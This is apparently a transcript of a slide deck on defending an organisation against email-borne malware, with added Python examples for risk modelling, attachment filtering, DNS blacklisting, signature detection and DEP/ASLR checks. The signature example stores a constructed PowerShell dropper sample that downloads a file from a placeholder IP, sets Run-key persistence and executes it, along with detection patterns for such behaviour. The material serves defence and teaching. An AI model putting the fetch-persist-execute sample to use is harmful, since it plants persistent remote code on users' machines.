Streeterville Group M. Aghajanian, M. Blackburn, T. Heller
Transcript of Streeterville Group M. Aghajanian, M. Blackburn, T. Heller
Page 1
Streeterville Group: M. Aghajanian, M. Blackburn, T. Heller
Defending Against Users Executing Malware Code via Email
Page 2
Case of Confounded Confections, Inc.
Introduction
• Ultra-secure network to protect their sweet secrets:
  1. Enterprise firewalls.
  2. Only necessary services, with required authentication.
  3. Tightly managed systems.
• Anomalies begin to appear.
• CIO wants to know…
Page 3
Investigation
Why?!
Page 4
Quick Review
Risk Analysis
• Risk analysis (quantitative)
• Policy
• Design
• Prevention
• Response or countermeasures
• Implementation
• Control
• Rinse and repeat...
Page 5
Classifications
• State of hosts: susceptible, infected, quarantined, recovered, transmitted, and healthy.
• Size of host population: small (binomial), large (Poisson).
• Diversity of hosts (mix of operating systems).
• Weight of susceptibility.
• Weight of business value.
Risk Analysis
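The classification above maps directly onto a small quantitative model. The following is an added Python example, not from the slides, that treats each host's susceptibility weight as its probability of infection in one period and its business-value weight as the loss if it is infected; the host inventory is constructed. It shows why the slide separates small and large populations: for a handful of hosts the binomial distribution is computed exactly, while for a large population with a small per-host probability the Poisson approximation with λ = n·p is within a fraction of a percent and far cheaper to compute.

```python
import math

# Constructed inventory for the case (not from the slides):
#   susceptibility = probability the host is infected in one period
#   value          = business loss if it is infected
HOSTS = [
    {"name": "ws-01", "os": "Windows XP", "susceptibility": 0.20, "value": 2_000},
    {"name": "ws-02", "os": "Windows XP", "susceptibility": 0.20, "value": 2_000},
    {"name": "ws-03", "os": "Windows 7", "susceptibility": 0.08, "value": 2_000},
    {"name": "mac-01", "os": "Mac OS X", "susceptibility": 0.03, "value": 2_500},
    {"name": "recipe-db", "os": "Linux", "susceptibility": 0.01, "value": 250_000},
]


def binomial_tail(n, p, k):
    """P(X >= k) for X ~ Binomial(n, p): exact, suited to a small population."""
    return sum(math.comb(n, i) * p ** i * (1 - p) ** (n - i) for i in range(k, n + 1))


def poisson_tail(lam, k):
    """P(X >= k) for X ~ Poisson(lam): the large-population approximation, lam = n * p."""
    return 1.0 - sum(math.exp(-lam) * lam ** i / math.factorial(i) for i in range(k))


def compare_models(n, p, k):
    """Probability that at least k of n hosts are infected, under both models."""
    return {"binomial": binomial_tail(n, p, k), "poisson": poisson_tail(n * p, k)}


def expected_loss(hosts):
    """Expected loss per period: sum of susceptibility x business value.
    Treats infections as independent; a worm spreading host-to-host is worse."""
    return sum(h["susceptibility"] * h["value"] for h in hosts)


def loss_by_os(hosts):
    """Expected loss per operating system: shows where host diversity matters."""
    out = {}
    for h in hosts:
        out[h["os"]] = out.get(h["os"], 0.0) + h["susceptibility"] * h["value"]
    return out


if __name__ == "__main__":
    print("small population, P(at least 1 of 10 infected):", compare_models(10, 0.1, 1))
    print("large population, P(at least 2 of 1000 infected):", compare_models(1000, 0.001, 2))
    print("expected loss per period:", expected_loss(HOSTS))
    print("by OS:", loss_by_os(HOSTS))
```

For the ten-host case the two models differ by about two percentage points; for a thousand hosts at 0.1% each they agree to six decimal places, which is the point of the small/large split on the slide. The expected-loss figure is dominated by the single high-value Linux server even though it is the least susceptible host, which is why the business-value weight is listed separately from susceptibility.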
Page 6
Risk Analysis
Page 7
General Cost of Malware
• Paradigm shift: indirect costs now outweigh direct costs overall.
• Largest expenses:
  • Staff hours for support.
  • Staff hours lost to downtime.
  • Hardware, software, vendor support and IT training.
  • Legal, human resources, and training.
Risk Analysis
Page 8
Design Solutions
• Layered schema for malware detection.
• Prevention by inspection at various points at the edge and perimeter.
• ClamAV (open source software solution).
• Microsoft perspective (proprietary software solution).
• Future approaches at the edge or perimeter (next sections).
Prevention at the Edge and Perimeter
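One concrete form of "inspection at the edge" is an attachment filter at the mail gateway. The following is an added Python example, not the authors' design and not ClamAV or Microsoft code, using only the standard library. The message and its attachments are constructed. It flags an attachment by blocked extension, by a double extension that disguises an executable as a document, and by a mismatch between the claimed extension and the file's magic bytes, and leaves a hook for a SHA-256 blocklist fed from an AV or threat feed (empty here).

```python
import email
import hashlib
from email import policy
from email.message import EmailMessage

# Extensions a mail gateway should never deliver to users (constructed list).
BLOCKED_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                      "vbs", "vbe", "hta", "jar", "msi", "ps1"}
# Extensions used as the "document" half of a double extension such as Invoice.pdf.exe.
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# Leading bytes that identify a file regardless of its name.
MAGIC = {b"MZ": "pe-executable", b"\x7fELF": "elf", b"%PDF": "pdf", b"PK\x03\x04": "zip"}
# Assumption: populated from your AV vendor or threat feed; empty in this example.
KNOWN_BAD_SHA256 = set()


def sniff(data):
    """Return the content type implied by the file's magic bytes."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def check_attachment(filename, data):
    """Return the reasons to block this attachment (empty list = deliver)."""
    reasons = []
    exts = (filename or "").lower().split(".")[1:]
    last = exts[-1] if exts else ""
    if last in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension .{last}")
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS:
            reasons.append("double extension disguised as a document")
    kind = sniff(data)
    if kind in ("pe-executable", "elf"):
        reasons.append(f"content is a {kind} regardless of its name")
    if last in DOCUMENT_EXTENSIONS and kind != "unknown" and kind != last:
        reasons.append(f"extension .{last} but content looks like {kind}")
    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        reasons.append("sha256 on blocklist")
    return reasons


def inspect_message(raw):
    """Parse a raw message and return [(filename, reasons)] for each attachment to block."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        reasons = check_attachment(part.get_filename(), data)
        if reasons:
            findings.append((part.get_filename(), reasons))
    return findings


def build_sample_message():
    """Constructed test message: a disguised executable, a mislabeled executable, a real PDF."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.com"
    msg["To"] = "staff@confounded-confections.example"
    msg["Subject"] = "Invoice attached"
    msg.set_content("Please review the attached invoice.")
    fake_exe = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56  # PE header stub only, no code
    msg.add_attachment(fake_exe, maintype="application", subtype="pdf", filename="Invoice.pdf.exe")
    msg.add_attachment(fake_exe, maintype="application", subtype="octet-stream", filename="report.pdf")
    msg.add_attachment(b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n", maintype="application",
                       subtype="pdf", filename="catalog.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, reasons in inspect_message(build_sample_message()):
        print(f"BLOCK {name}: {'; '.join(reasons)}")
```

Each check is independent, so renaming the executable defeats only the extension rule and the magic-byte rule still fires; that is the layering the slide asks for. A gateway filter like this still needs to look inside archives (the zip magic is recognised but not expanded here) and cannot judge a document that carries an exploit for its own reader, which is where the AV engines on the next slides come in.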
Page 9
Prevention at the Edge and Perimeter
Layered Protection: Microsoft Approach
Page 10
Exploitations
Responding to User Actions: Clicking on Links
• Drive-by downloads
  o Exploit browser vulnerabilities: JavaScript/ECMAScript, content parsing.
  o Exploit vulnerabilities in browser add-ons: Flash, Adobe Reader, Java.
Page 11
Countermeasures
Responding to User Actions: Clicking on Links
• DNS blacklisting
  o Used by spam filtering software.
  o Repurposed for everyday DNS resolution.
  o Prevents access to sites known to host malware.
  o 11.25¢ per user/year.
• SSL proxy with malcode detection
  o Inspects content for malcode delivery, including within encrypted sessions.
  o Catches only what its detection engine recognises, and every client must trust the proxy's CA certificate for interception to work.
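How the "repurposed DNS blacklist" works in practice, as an added Python example that is not the slides' code. The blocklist, the sinkhole address and the upstream answers are constructed. The first function builds the reversed-octet query name a spam filter sends to a DNSBL zone; the rest apply the same listing idea to ordinary name resolution: a name whose own label or any parent domain is listed gets a sinkhole address instead of a real answer, which is what a response-policy zone on a recursive resolver does.

```python
import ipaddress

# Constructed policy data (not from the slides).
BLOCKLIST = {"malware-dl.example", "bad-cdn.example", "phish.example.net"}
SINKHOLE = "10.0.0.250"        # assumption: internal host serving a "blocked" page
UPSTREAM = {                    # stand-in for real recursive resolution
    "www.example.com": "93.184.216.34",
    "cdn.malware-dl.example": "198.51.100.7",
    "updates.example.com": "203.0.113.20",
}


def policy_lookup(qname, blocklist=BLOCKLIST, sinkhole=SINKHOLE):
    """Return the sinkhole if qname or any parent domain is listed, else None.
    Matching is by whole labels, so notmalware-dl.example is not caught by
    the entry malware-dl.example."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in blocklist:
            return sinkhole
    return None


def resolve(qname, upstream=UPSTREAM):
    """Policy-aware resolution: sinkhole listed names, otherwise ask upstream."""
    hit = policy_lookup(qname)
    if hit is not None:
        return {"answer": hit, "blocked": True}
    return {"answer": upstream.get(qname.rstrip(".").lower()), "blocked": False}


def dnsbl_query_name(ip, zone):
    """Query name a spam filter sends to a DNSBL: the address octets (IPv6:
    nibbles) reversed, then the zone, e.g. 192.0.2.99 -> 99.2.0.192.<zone>."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 4:
        rev = ".".join(reversed(addr.exploded.split(".")))
    else:
        rev = ".".join(reversed(addr.exploded.replace(":", "")))
    return f"{rev}.{zone}"


def dnsbl_listed(answer):
    """A DNSBL answers with a 127.0.0.0/8 address for listed entries (the last
    octet encodes a zone-specific reason); NXDOMAIN (None here) means not listed."""
    return answer is not None and ipaddress.ip_address(answer) in ipaddress.ip_network("127.0.0.0/8")


if __name__ == "__main__":
    print(dnsbl_query_name("192.0.2.99", "dnsbl.example"))
    for name in ("www.example.com", "cdn.malware-dl.example", "login.phish.example.net"):
        print(name, "->", resolve(name))
```

Suffix matching is what makes the list cheap to maintain: one entry for a domain covers every host under it, which is why the slide can price it per user rather than per site. The sinkhole should be an internal address that logs the request, since each hit is a user who clicked a link to a listed site and may need follow-up.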
Page 12
Prevention—Human Factor
Responding to User Actions: Clicking on Links
• User training
  o Detect suspicious emails.
  o Close the browser if concerned.
• Acceptable use policy
  o Discourage promiscuous behavior.
  o "Scare tactic" heightens the stakes.
• Ongoing communication
  o Ongoing remediation costs = foregone benefits.
  o Reinforce desired behavior.
Page 13
Mitigation—Technical Approaches
Responding to User Actions: Clicking on Links
• Application selection
  o Remove Adobe Reader: 55% of all attacks.
  o Remove IE6: 5% of all attacks.
• Update policies
  o Use Microsoft Group Policy to update MS products automatically.
  o Communicate with and inform users.
  o Perform software audits (not feasible in decentralized networks).
Page 14
Mitigation—Human Factor
Responding to User Actions: Clicking on Links
• User cooperation
o Accept new updates
o Don't install unknown plugins
• Vendor support
o Push updates to all clients
o Centralized patch level monitoring
o Create vendor compliance standards
Page 15
Antivirus Signatures
Responding to User Actions: Opening Attachments
o Typical approach: bit-by-bit signatures (a.k.a. "hash").
o New approach: behavioral signatures.
o Influence: script kiddies (trivial edits to existing malware defeat a bit-by-bit signature).
o Policy and enforcement: additional software may be required; performance hit; instrumentation and legacy systems.
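Why the slide contrasts the two approaches, as an added Python example that is not the slides' code nor any AV vendor's rule set. The sample is a constructed, harmless dropper-like script. A bit-for-bit (SHA-256) signature matches the original and nothing else, so a single changed byte, the kind of edit a script kiddie makes, evades it. A behavioral signature describes what the sample does (downloads a file, sets a Run-key persistence entry, launches a process) and still fires on the variant. The patterns and rule names are assumptions chosen for the example.

```python
import hashlib
import re

# Constructed sample (not real malware): download, persist via Run key, execute.
SAMPLE_V1 = b"""
$u = "http://198.51.100.7/payload.bin"
$p = "$env:APPDATA\\svc.exe"
(New-Object Net.WebClient).DownloadFile($u, $p)
Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run svc $p
Start-Process $p
"""
# The "script kiddie" variant: one cosmetic change to the file name.
SAMPLE_V2 = SAMPLE_V1.replace(b"svc.exe", b"svd.exe")

# Bit-for-bit signature database: exact SHA-256 of a known sample.
HASH_SIGNATURES = {hashlib.sha256(SAMPLE_V1).hexdigest(): "Dropper.A"}

# Behavioral signature: individual behaviours, each recognised by a pattern
# (assumed patterns for the example), and rules that fire on a combination.
BEHAVIORS = {
    "downloads_file": re.compile(rb"DownloadFile|Invoke-WebRequest|curl\s", re.I),
    "writes_run_key": re.compile(rb"CurrentVersion\\Run", re.I),
    "launches_process": re.compile(rb"Start-Process|CreateProcess", re.I),
}
BEHAVIOR_RULES = {
    "Dropper.behavior": {"downloads_file", "writes_run_key", "launches_process"},
}


def hash_match(data):
    """Bit-for-bit detection: name of the matching signature, or None."""
    return HASH_SIGNATURES.get(hashlib.sha256(data).hexdigest())


def observed_behaviors(data):
    """Set of behaviour names whose pattern occurs in the sample."""
    return {name for name, rx in BEHAVIORS.items() if rx.search(data)}


def behavior_match(data):
    """Behavioral detection: first rule whose required behaviours are all present."""
    seen = observed_behaviors(data)
    for name, required in BEHAVIOR_RULES.items():
        if required <= seen:
            return name
    return None


def scan(data):
    """Run both detectors so the difference is visible side by side."""
    return {"hash": hash_match(data), "behavior": behavior_match(data)}


if __name__ == "__main__":
    print("original:", scan(SAMPLE_V1))
    print("variant: ", scan(SAMPLE_V2))
```

The variant costs the attacker one byte and costs the hash database a new entry per variant, which is the "script kiddie" problem the slide refers to. The behavioral rule keeps working but runs several regular expressions over every file instead of one hash, which is the performance hit, and a rule this broad will also flag a legitimate installer script, so rules need tuning against the environment's own software before enforcement.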
Page 16
Policies and Enforcement
Responding to User Actions: Opening Attachments
• Antivirus/OS update policies and procedures
  o Responses to malware/vulnerabilities, a.k.a. patches.
  o Trade-off for admins: user freedom/power versus computer security.
  o If users choose when to update...
  o If admins choose when to update...
  o "Managed" antivirus software shows who is doing what: privacy issues.
• Distributed support system
  o Typical of universities.
  o Policies and enforcement up to non-IT personnel.
Page 17
OS Countermeasures
Responding to User Actions: Opening Attachments
• User privilege management
  o Usually centralized.
  o Environment and staff affect leniency: a research environment requires more user privileges; less IT staff requires more user privileges.
  o Requirements, reactions & risk: users have different tasks, downtime and productivity requirements.
• Vendor/instrumentation/legacy computers
  o Limited support, no software patching (vendor not liable).
  o Various versions of antivirus software.
  o User POV: updating is confusing and lengthy, slows the computer and requires a system reboot.
Page 18
Execution and Service Management
Responding to User Actions: Opening Attachments
• OSs require password authorization before execution
  o Protects against "accidentally" installing unwanted software.
  o Users can enter the password and move on, so the prompt alone does not stop a tricked user.
• DEP & ASLR
  o DEP since Windows XP SP2 (ASLR since Windows Vista); Mac OS X.
  o Each is effective on its own, but exploits that bypass them have been written for IE8 and Firefox (Mac & Win).
  o Defense-in-depth: makes exploits slower and harder to write.
  o Layering defenses: more obstacles for the attacker, more opportunities to detect and stop the attack.
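Whether a given program actually gets DEP and ASLR is decided per image: on Windows the linker records opt-in bits in the PE optional header's DllCharacteristics field (NX_COMPAT for DEP, DYNAMIC_BASE for ASLR) and the loader honours them. The following is an added Python example, not from the slides, that reads those bits from a PE file; the images it checks are constructed headers from build_pe, not real executables. Against a real binary the same check is pe_mitigations(open(path, "rb").read()).

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DYNAMIC_BASE = 0x0040      # image may be relocated at load time: ASLR opt-in
NX_COMPAT = 0x0100         # image is compatible with DEP (no executable data pages)
HIGH_ENTROPY_VA = 0x0020   # 64-bit image may be placed anywhere in the address space
PE32, PE32PLUS = 0x10B, 0x20B


def pe_mitigations(data):
    """Read the DEP/ASLR opt-in bits of a PE image.
    Raises ValueError if the bytes are not a PE file this check can parse."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    coff = e_lfanew + 4                                           # 20-byte COFF header
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                               # optional header
    if size_of_optional < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32, PE32PLUS):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both the PE32 and PE32+ layouts.
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "dep": bool(dll_characteristics & NX_COMPAT),
        "aslr": bool(dll_characteristics & DYNAMIC_BASE),
        "high_entropy_va": magic == PE32PLUS and bool(dll_characteristics & HIGH_ENTROPY_VA),
    }


def build_pe(dll_characteristics, magic=PE32PLUS):
    """Constructed minimal PE image: DOS header, PE signature, COFF header and an
    optional header carrying only the fields read above.  Not a loadable program."""
    dos_header = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64)    # e_lfanew = 64
    coff_header = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x0022)
    optional = bytearray(240)
    struct.pack_into("<H", optional, 0, magic)
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return dos_header + b"PE\0\0" + coff_header + bytes(optional)


if __name__ == "__main__":
    for label, flags in (("hardened", NX_COMPAT | DYNAMIC_BASE | HIGH_ENTROPY_VA), ("legacy", 0)):
        print(label, pe_mitigations(build_pe(flags)))
```

The check has to be run over every module a process loads, not only the main executable: a single DLL or plug-in linked without DYNAMIC_BASE sits at a fixed address and hands an exploit a known location to return into, which is the usual way an "individually effective" mitigation gets bypassed and why the slide treats the two as layers rather than as a complete answer.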
Page 19
Future Approaches
• Network-level sandbox
  o Users are accustomed to waiting for email.
• Deep-scanning email clients
  o Number of cores/CPUs growing; privacy issues.
• Research: extent of malware coders sharing/upgrading malware.
• Executable signatures.
• Non-IT policies
  o High-level policies (HIPAA, SOX) bring more IT support funding and detail, and force everyone to abide (legal consequences).
• Northwestern University
  o Proactive policies, training.
Responding to User Actions: Opening Attachments